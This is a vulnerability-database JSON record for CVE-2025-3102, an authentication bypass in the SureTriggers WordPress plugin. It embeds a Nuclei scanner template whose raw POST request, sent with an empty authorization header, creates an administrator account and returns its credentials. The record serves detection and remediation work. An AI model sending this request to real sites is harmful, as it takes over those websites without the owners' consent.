{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-3102/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-3102/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-3102/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-3102/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-3102/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-3102"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-3102"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-3102.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2025-3102\n\ninfo:\n  name: SureTriggers – All-in-One Automation Platform ≤ 1.0.78 - Authentication Bypass\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    The SureTriggers- All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_user' function in all versions up to, and including, 1.0.78. This makes it possible for unauthenticated attackers to create administrator accounts on the target website when the plugin is installed and activated but not configured with an API key.\n  impact: |\n    Unauthenticated attackers can create administrator accounts when the SureTriggers plugin is installed but not configured with an API key, gaining complete control over the WordPress site.\n  remediation: |\n    Upgrade to SureTriggers version 1.0.79 or later that properly validates the secret_key parameter.\n  reference:\n    - https://plugins.trac.wordpress.org/browser/suretriggers/trunk/src/Controllers/RestController.php#L59\n    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve\n    - https://github.com/Nxploited/CVE-2025-3102\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2025-3102\n    cwe-id: CWE-697\n    epss-score: 0.76237\n    epss-percentile: 0.9952\n  metadata:\n    verified: true\n    max-request: 1\n    public-query: \"/wp-content/plugins/suretriggers\"\n  tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln\n\nvariables:\n  username: \"{{rand_base(6)}}\"\n  password: \"{{rand_base(8)}}\"\n  email: \"{{randstr}}@{{rand_base(5)}}.com\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        st_authorization:\n\n        {\"integration\": \"WordPress\", \"type_event\": \"create_user_if_not_exists\", \"selected_options\": {\"user_email\": \"{{email}}\", \"user_name\": \"{{username}}\", \"password\": \"{{password}}\"}, \"fields\": [], \"context\": {}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n          - '\"user_registered\":'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"Username: \" + username + \" Password: \" + password'\n# digest: 4b0a00483046022100bea192b49a0a8dec47f0080a27c2bc0c7758e449c293cc22e09cc744d741fc4502210091de50646220fbc61c596f5112de123a021d279f0b13ecdf456ac7dfa400efe5:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-3102"
}